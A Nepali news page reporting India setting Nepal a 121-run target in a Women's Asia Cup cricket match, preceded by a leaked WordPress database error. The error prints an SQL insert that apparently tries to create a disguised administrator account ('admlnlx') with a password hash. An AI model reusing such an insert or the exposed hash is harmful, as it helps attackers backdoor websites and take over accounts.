WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE22f3CfXJYErVzBtCT8Du2398vJmS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:06:04', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १७–
महिला एसिया कप क्रिकेटमा भारतले नेपालसामू १२१ रनको चुनौती दिएको छ ।
सो चुनौती लिएर नेपालले अहिले जवाफी ब्याटिङ गरिरहेको छ । नेपालले ४.२ ओभरमा २ विकेट गुमाउँदै ९ रन बनाएर खेलिरहेको छ ।
यसअघि बैंककमा टस हारेर पहिले ब्याटिङ गरेको भारतले निर्धारित २० ओभरमा ५ विकेट गुमाएर १२० रन बनायो । उसको सुरुवात औसत रहृयो ।
२० रन जोड्दा पहिलो विकेट गुमाएको भारतले एक समय ६९ रन जोड्दा ५ विकेट गुमाइसकेको थियो । तर, शिखा पाण्डे र हर्मनप्रित कौरले छैटौ विकेटका लागि अविजित ५१ रनको साझेदारी गरिन् । पाण्डे ३९ र कौर १४ रनमा अविजित रहिन् ।
नेपालकी रुविना क्षेत्रीले २ विकेट लिइन् भने करुणा भण्डारी र सीता राना मगरले एक एक विकेट लिए ।